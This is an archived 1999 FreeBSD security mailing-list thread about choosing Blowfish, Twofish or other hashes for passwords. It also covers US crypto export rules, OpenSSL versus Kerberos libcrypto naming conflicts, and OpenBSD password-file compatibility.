+0200 From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Poul-Henning Kamp Cc: Robert Watson , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish References: <2570.925637444@critter.freebsd.dk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poul-Henning Kamp wrote: > > In message <372C19F5.625BB2B@vangelderen.org>, "Jeroen C. van Gelderen" writes: > >Robert Watson wrote: > >[...] > >> I'd recommend against using Blowfish--go for Twofish. > > > >Regardless of what you think about Blowfish, recommending Twofish > >is a very, very bad move. > > Considering that the concept for passwords is a "kleenex-model", > it doesn't matter. We can change the algorithm at the first hint > of trouble and ask people to change passwords and we're in safe > water. That's not the point. In crypto you need to be as conservative as possible. Recommending a newly invented algorithm before it has seen intensive analysis is not a good idea. It doesn't matter what the application is. Cheers, Jeroen -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 2:51:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id D5C1B14C40 for ; Sun, 2 May 1999 02:51:19 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from ut243008.inbel.utwente.nl ([130.89.243.8]:2573 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <7971-20163>; Sun, 2 May 1999 11:51:00 +0200 Message-ID: <372C2001.BEA307F6@vangelderen.org> Date: Sun, 02 May 1999 11:50:57 +0200 From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Harry M. Leitzell" Cc: Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Harry M. Leitzell" wrote: > 1) If Robert were to write code on a machine that > is in a foreign country, would it have been considered > exported? (Xterm on a cs.hut.fi machine for example > to code in) Even if he is in the US while doing so? Yes. > 2) Can we still do the moving by paper to another > country and scanning it in? Is that legitimate or > been deemed illegal? Yes and no. Yes, if you publish it it is covered by the first amendement and you can freely export the book. But you will have to *publish* the crypto, just printing it in a letter is not good enough. Fortunately, getting your 'work' published is not that hard; There are companies that specialize in low volume printing... > 3) If I write a disk encryptor that sits on the MBR > and transfer the disk out of country, is that a no-no? Maybe. It was for quite a while but right now there are some exceptions. You can get a license and promise that you won't give the stuff to foreigners and you are allowed to take the software with you. Check out the M$ or Netscape websites, I think it's covered there for their 128-bit browsers. Note: I'm not a lawyer and not an US citizen. Get legal advise before you do something. Mail me in private if you need addresses and such. Cheers, Jeroen -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 3: 8:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 9330F14C40 for ; Sun, 2 May 1999 03:08:11 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id MAA22117; Sun, 2 May 1999 12:08:09 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id MAA02687; Sun, 2 May 1999 12:08:08 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: "Jordan K. Hubbard" Cc: "Jeroen C. van Gelderen" , Robert Watson , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-reply-to: Your message of "Sun, 02 May 1999 02:33:27 PDT." <23355.925637607@zippy.cdrom.com> Date: Sun, 02 May 1999 12:08:07 +0200 Message-ID: <2685.925639687@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <23355.925637607@zippy.cdrom.com>, "Jordan K. Hubbard" writes: >> Considering that the concept for passwords is a "kleenex-model", > >OK, I'll bite, what the hell is a "kleenex-model" ? :-) The things we encrypt are transient, we don't need to keep them around for later decryption and they can be replaced with no problems. If we find a problem with MD5 as we use it today, we simply plug in something stronger and tell users to change their passwords (or ELSE!) and we're in no danger anymore. If we had real encrypted data we would need to retrieve it, decrypt it recrypt it, store it *and make sure the copy made with the old encryption is GONE* This is a PITA if you have it stored in an optical jukebox for instance. I was the one who coined the term "kleenex-model" for it, but it may not be a very apt term... -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 3:13:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from zeus.theinternet.com.au (zeus.theinternet.com.au [203.34.176.2]) by hub.freebsd.org (Postfix) with ESMTP id 8812C15149 for ; Sun, 2 May 1999 03:13:40 -0700 (PDT) (envelope-from akm@zeus.theinternet.com.au) Received: (from akm@localhost) by zeus.theinternet.com.au (8.9.3/8.8.7) id UAA65271; Sun, 2 May 1999 20:09:17 +1000 (EST) (envelope-from akm) From: Andrew Kenneth Milton Message-Id: <199905021009.UAA65271@zeus.theinternet.com.au> Subject: Re: Blowfish/Twofish In-Reply-To: <23355.925637607@zippy.cdrom.com> from "Jordan K. Hubbard" at "May 2, 1999 2:33:27 am" To: jkh@zippy.cdrom.com (Jordan K. Hubbard) Date: Sun, 2 May 1999 20:09:17 +1000 (EST) Cc: phk@critter.freebsd.dk, jeroen@vangelderen.org, robert+freebsd@cyrus.watson.org, geniusj@phoenix.unacom.com, brian@capital-data.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org +----[ Jordan K. Hubbard ]--------------------------------------------- | > Considering that the concept for passwords is a "kleenex-model", | | OK, I'll bite, what the hell is a "kleenex-model" ? :-) Disposable -- personified. :-) -- Totally Holistic Enterprises Internet| P:+61 7 3870 0066 | Andrew The Internet (Aust) Pty Ltd | F:+61 7 3870 4477 | Milton ACN: 082 081 472 | M:+61 416 022 411 |72 Col .Sig PO Box 837 Indooroopilly QLD 4068 |akm@theinternet.com.au|Specialist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 5:12:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 84CEA15440 for ; Sun, 2 May 1999 05:12:13 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id OAA35957; Sun, 2 May 1999 14:12:04 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id OAA01249; Sun, 2 May 1999 14:11:57 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021211.OAA01249@greenpeace.grondar.za> To: "Jordan K. Hubbard" Cc: "Jeroen C. van Gelderen" , Robert Watson , Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 02:32:55 MST." <23332.925637575@zippy.cdrom.com> References: <23332.925637575@zippy.cdrom.com> Date: Sun, 02 May 1999 14:11:56 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jordan K. Hubbard" wrote: > Erm, one of the goals of PAM is to support *multiple* encryption > methods, so why not do a PAM module for each and let the administrator > decide which authentication methods to support in /etc/pam.conf? Hear, hear! M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 5:49:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id F09B215222 for ; Sun, 2 May 1999 05:49:11 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id OAA15326; Sun, 2 May 1999 14:49:07 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id OAA24508; Sun, 2 May 1999 14:49:06 +0200 (MET DST) Date: Sun, 2 May 1999 14:49:06 +0200 From: Eivind Eklund To: Robert Watson Cc: Poul-Henning Kamp , The Tech-Admin Dude , Brian Beaulieu , freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502144906.E23950@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: ; from Robert Watson on Sat, May 01, 1999 at 03:07:30PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 01, 1999 at 03:07:30PM -0400, Robert Watson wrote: > So I'd gladly write this code, as well as do a number of other > crypto-related things, but I'm inside the US. Someone outside the US will > have to take this initiative, I'm afraid. For this application, being inside the US is probably not a problem. The way I would implement this is to use OpenSSL (formerly SSLeay) through their library interface, dlopen() the library, and only support Blowfish passwords if the library is available. As what you'll be writing is authentication infrastructure, not encryption infrastructure, exporting it is not a problem. I do not know of any country that forbid export of authentication infrastructure. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 7:58:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 68F3B151B4; Sun, 2 May 1999 07:58:38 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id QAA36303; Sun, 2 May 1999 16:58:36 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id QAA02696; Sun, 2 May 1999 16:58:30 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021458.QAA02696@greenpeace.grondar.za> To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 14:49:06 +0200." <19990502144906.E23950@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> Date: Sun, 02 May 1999 16:58:29 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > On Sat, May 01, 1999 at 03:07:30PM -0400, Robert Watson wrote: > > So I'd gladly write this code, as well as do a number of other > > crypto-related things, but I'm inside the US. Someone outside the US will > > have to take this initiative, I'm afraid. > > For this application, being inside the US is probably not a problem. > The way I would implement this is to use OpenSSL (formerly SSLeay) > through their library interface, dlopen() the library, and only > support Blowfish passwords if the library is available. As what > you'll be writing is authentication infrastructure, not encryption > infrastructure, exporting it is not a problem. I do not know of any > country that forbid export of authentication infrastructure. _Way_ overkill. A far simpler structure can easily be built by hand. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 8: 9:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 77080151B4 for ; Sun, 2 May 1999 08:09:36 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id RAA16760; Sun, 2 May 1999 17:09:35 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id RAA33176; Sun, 2 May 1999 17:09:29 +0200 (MET DST) Date: Sun, 2 May 1999 17:09:29 +0200 From: Eivind Eklund To: Mark Murray Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502170929.B32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199905021458.QAA02696@greenpeace.grondar.za>; from Mark Murray on Sun, May 02, 1999 at 04:58:29PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 04:58:29PM +0200, Mark Murray wrote: > Eivind Eklund wrote: > > On Sat, May 01, 1999 at 03:07:30PM -0400, Robert Watson wrote: > > > So I'd gladly write this code, as well as do a number of other > > > crypto-related things, but I'm inside the US. Someone outside the US will > > > have to take this initiative, I'm afraid. > > > > For this application, being inside the US is probably not a problem. > > The way I would implement this is to use OpenSSL (formerly SSLeay) > > through their library interface, dlopen() the library, and only > > support Blowfish passwords if the library is available. As what > > you'll be writing is authentication infrastructure, not encryption > > infrastructure, exporting it is not a problem. I do not know of any > > country that forbid export of authentication infrastructure. > > _Way_ overkill. A far simpler structure can easily be built by hand. I do not understand what you mean - elaborate? Dynamically linking in a new library if it is present is not very difficult - do you mean that OpenSSL has too complicated an API? Or what is it you're trying to say? Eivind, confused. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 8:42: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 5F0E915225; Sun, 2 May 1999 08:41:51 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id RAA36381; Sun, 2 May 1999 17:41:50 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id RAA02885; Sun, 2 May 1999 17:41:48 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021541.RAA02885@greenpeace.grondar.za> To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 17:09:29 +0200." <19990502170929.B32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> Date: Sun, 02 May 1999 17:41:47 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > > _Way_ overkill. A far simpler structure can easily be built by hand. > > I do not understand what you mean - elaborate? Dynamically linking in > a new library if it is present is not very difficult - do you mean > that OpenSSL has too complicated an API? Or what is it you're trying > to say? Yes. libcrypto from OpenSSL is huge, and is hefty overkill for a password hashing system. Apart from that, it has a name conflict with kerberos (which also has a libcrypto). A password hashing system just needs a couple (few?) good hashes; nothing else. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:16:57 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 366BB1542D for ; Sun, 2 May 1999 09:16:50 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id SAA17563; Sun, 2 May 1999 18:16:49 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id SAA33436; Sun, 2 May 1999 18:16:47 +0200 (MET DST) Date: Sun, 2 May 1999 18:16:47 +0200 From: Eivind Eklund To: Mark Murray Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502181647.C32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199905021541.RAA02885@greenpeace.grondar.za>; from Mark Murray on Sun, May 02, 1999 at 05:41:47PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 05:41:47PM +0200, Mark Murray wrote: > Eivind Eklund wrote: > > > _Way_ overkill. A far simpler structure can easily be built by hand. > > > > I do not understand what you mean - elaborate? Dynamically linking in > > a new library if it is present is not very difficult - do you mean > > that OpenSSL has too complicated an API? Or what is it you're trying > > to say? > > Yes. libcrypto from OpenSSL is huge, and is hefty overkill for a > password hashing system. Apart from that, it has a name conflict > with kerberos (which also has a libcrypto). > > A password hashing system just needs a couple (few?) good hashes; > nothing else. The point of this exercise would (IMO, at least) only be OpenBSD compatibility, where OpenBSD for marketeering reasons has decided to use Blowfish as part of their hash algorithm. If people can't migrate their password files, they are much less likely to migrate to FreeBSD, which means we should support their password formats if feasible. As for the libcrypto naming conflict - is the Kerberos libcrypto used by things outside Kerberos, or is it feasible to rename it? When I get around to integrating the signature support into pkg_* (I have code that work in a test environment, but haven't had time to integrate it), we'll need libcrypto from OpenSSL in order to support signatures - and renaming it in the port would IMO be fairly evil. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:21:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp11.bellglobal.com (smtp11.bellglobal.com [204.101.251.53]) by hub.freebsd.org (Postfix) with ESMTP id 4F25E154B4; Sun, 2 May 1999 09:21:44 -0700 (PDT) (envelope-from bryanf@geisha.apt.samurai.com) Received: from geisha.apt.samurai.com (HSE-TOR-ppp37129.sympatico.ca [209.226.141.196]) by smtp11.bellglobal.com (8.8.5/8.8.5) with ESMTP id MAA13643; Sun, 2 May 1999 12:24:15 -0400 (EDT) Received: (from bryanf@localhost) by geisha.apt.samurai.com (8.9.1a/8.9.1) id MAA00338; Sun, 2 May 1999 12:21:43 -0400 (EDT) Date: Sun, 2 May 1999 12:21:43 -0400 From: Bryan Fullerton To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502122142.A289@samurai.com> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.96.1i In-Reply-To: <19990502181647.C32819@bitbox.follo.net>; from Eivind Eklund on Sun, May 02, 1999 at 06:16:47PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 06:16:47PM +0200, Eivind Eklund wrote: > > The point of this exercise would (IMO, at least) only be OpenBSD > compatibility, where OpenBSD for marketeering reasons has decided to > use Blowfish as part of their hash algorithm. If people can't migrate > their password files, they are much less likely to migrate to FreeBSD, > which means we should support their password formats if feasible. Are there many people migrating from OpenBSD to FreeBSD? Bryan -- Bryan Fullerton http://www.samurai.com/ Owner, Lead Consultant http://www.feh.net/ Samurai Consulting http://www.icomm.ca/ "No, we don't do seppuku." Can you feel the Ohmu call? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:27:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 5310C14F80; Sun, 2 May 1999 09:27:31 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id SAA36494; Sun, 2 May 1999 18:27:29 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id SAA03150; Sun, 2 May 1999 18:27:29 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021627.SAA03150@greenpeace.grondar.za> To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 18:16:47 +0200." <19990502181647.C32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> Date: Sun, 02 May 1999 18:27:29 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eivind Eklund wrote: > > Yes. libcrypto from OpenSSL is huge, and is hefty overkill for a > > password hashing system. Apart from that, it has a name conflict > > with kerberos (which also has a libcrypto). > > > > A password hashing system just needs a couple (few?) good hashes; > > nothing else. > > The point of this exercise would (IMO, at least) only be OpenBSD > compatibility, where OpenBSD for marketeering reasons has decided to > use Blowfish as part of their hash algorithm. If people can't migrate > their password files, they are much less likely to migrate to FreeBSD, > which means we should support their password formats if feasible. No problem. It can be added as a one-file addition to the current system. > As for the libcrypto naming conflict - is the Kerberos libcrypto used > by things outside Kerberos, or is it feasible to rename it? When I > get around to integrating the signature support into pkg_* (I have > code that work in a test environment, but haven't had time to > integrate it), we'll need libcrypto from OpenSSL in order to support > signatures - and renaming it in the port would IMO be fairly evil. Ditto for Kerberos, and Kerberos got there first :-) How do your signatures work? Can you not just use the MD? and SHA algorithms out of libmd? If not, can we not extend libmd? M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:28:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 1142015107; Sun, 2 May 1999 09:28:55 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id SAA17692; Sun, 2 May 1999 18:28:54 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id SAA33527; Sun, 2 May 1999 18:28:53 +0200 (MET DST) Date: Sun, 2 May 1999 18:28:53 +0200 From: Eivind Eklund To: Bryan Fullerton Cc: freebsd-chat@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502182853.D32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> <19990502122142.A289@samurai.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <19990502122142.A289@samurai.com>; from Bryan Fullerton on Sun, May 02, 1999 at 12:21:43PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Moved to -chat - please try to hold the lists reasonably to their topic. On Sun, May 02, 1999 at 12:21:43PM -0400, Bryan Fullerton wrote: > On Sun, May 02, 1999 at 06:16:47PM +0200, Eivind Eklund wrote: > > > > The point of this exercise would (IMO, at least) only be OpenBSD > > compatibility, where OpenBSD for marketeering reasons has decided to > > use Blowfish as part of their hash algorithm. If people can't migrate > > their password files, they are much less likely to migrate to FreeBSD, > > which means we should support their password formats if feasible. > > Are there many people migrating from OpenBSD to FreeBSD? I don't know - but the chance of there being many of them increases if there is a simple way for them to migrate. This needs to include the ability to keep their old password files. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:46:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 797F514D9E for ; Sun, 2 May 1999 09:46:27 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id SAA17858; Sun, 2 May 1999 18:46:26 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id SAA33620; Sun, 2 May 1999 18:46:26 +0200 (MET DST) Date: Sun, 2 May 1999 18:46:25 +0200 From: Eivind Eklund To: Mark Murray Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish Message-ID: <19990502184625.E32819@bitbox.follo.net> References: <21634.925539195@critter.freebsd.dk> <19990502144906.E23950@bitbox.follo.net> <199905021458.QAA02696@greenpeace.grondar.za> <19990502170929.B32819@bitbox.follo.net> <199905021541.RAA02885@greenpeace.grondar.za> <19990502181647.C32819@bitbox.follo.net> <199905021627.SAA03150@greenpeace.grondar.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199905021627.SAA03150@greenpeace.grondar.za>; from Mark Murray on Sun, May 02, 1999 at 06:27:29PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 02, 1999 at 06:27:29PM +0200, Mark Murray wrote: > Eivind Eklund wrote: > > As for the libcrypto naming conflict - is the Kerberos libcrypto used > > by things outside Kerberos, or is it feasible to rename it? When I > > get around to integrating the signature support into pkg_* (I have > > code that work in a test environment, but haven't had time to > > integrate it), we'll need libcrypto from OpenSSL in order to support > > signatures - and renaming it in the port would IMO be fairly evil. > > Ditto for Kerberos, and Kerberos got there first :-) I know - I'm trying to find the lesser of the two evils. That's why I was asking if it was used outside of Kerberos itself. > How do your signatures work? Can you not just use the MD? and SHA > algorithms out of libmd? If not, can we not extend libmd? They use x.509 and the Sun package signature standard. As far as I remember, it would be possible to re-implement parts of the code based on something other than x.509 (e.g, DSA) and still be marginally compliant (no other tools would work, but the standard allows alternate signature algorithms, and signatures based on several public key system on the same package). However, that would be more work than I'll have time for in the forseeable future :-( The code was written with the assumption that we could make it work by just requiring the libcrypto from (then) SSLeay in order to actually do any signature checking by just opening it dynamically and check signatures if it was there. The signatures aren't "mine", BTW - the code was written by one of my co-workers (rmz@yes.no) on company time. Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 2 9:56:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 88283153AE; Sun, 2 May 1999 09:56:12 -0700 (PDT) (envelope-from mark@grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.3/8.9.3) with ESMTP id SAA36566; Sun, 2 May 1999 18:56:11 +0200 (SAST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id SAA03362; Sun, 2 May 1999 18:56:10 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199905021656.SAA03362@greenpeace.grondar.za> To: Eivind Eklund Cc: freebsd-security@FreeBSD.ORG Subject: Re: Blowfish/Twofish In-Reply-To: Your message of " Sun, 02 May 1999 18:46:25 +0200." <19990502184625.E32819@bitbox.follo.net> References: 